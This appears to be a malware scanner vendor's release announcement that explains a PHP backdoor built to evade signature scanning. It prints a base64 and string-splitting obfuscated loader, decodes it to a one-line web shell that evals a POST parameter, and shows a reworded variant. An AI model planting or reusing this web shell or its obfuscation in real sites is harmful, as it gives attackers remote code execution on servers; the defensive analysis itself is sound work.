Today we released the new version 1.24.13 of ISPProtect malware scanner.

It includes some new malware signatures and new heuristics for dynamic malware code of which we want to show you a new type of malware that is hard to recognize for static code scanners (like Hex signatures of virus scanners).

<?php 
$code1="aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9";
$sp9="st"."r_"."r"."ep"."la"."ce";
$nv7 = $sp9("vc","","cvcrvcevcavctvce_fvcuncvctivconvc");
$bd0=$sp9("vb","","bvbasvbe6vb4_dvbecvbovbde");
$ex5 = $nv7('', $bd0($code1));
$ex5();

in fact the above code is nothing other than a crypted version of the following:

<?php
if(isset($_POST["qipj"])){@eval($_POST["qipj"]);exit;}

As the key names can be any string, the base64 encoded string in the visible source code (aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9) is dynamic and creating a hex signature for it does not make any sense.
In addition the replacement strings (here “vc” and “vb”) can also be dynamic.

So the malware creator could change the code without effort to this one doing exactly the same:

<?php
$c01de1="aWYoIGlzc2V0KCRfUE9TVFsiYXZjcyJdKSl7QGV2YWwoJF9QT1NUWyJhdmNzIl0pO2V4aXQ7IH0=";
$sp2="s"."tr".""."_"."rep".""."l"."a"."c".""."e"."";
$avc7 = $sp2("234","","c234r234e234a234t234e_f234un234cti234on234");
$bd0=$sp2("567","","b567as567e65674_d567ec567o567de");
$v315 = $avc7('', $bd0($c01ode1));
$v315();

As you can see each line of the code has changed without affecting the result.

New version 1.24.13 with new malware heuristics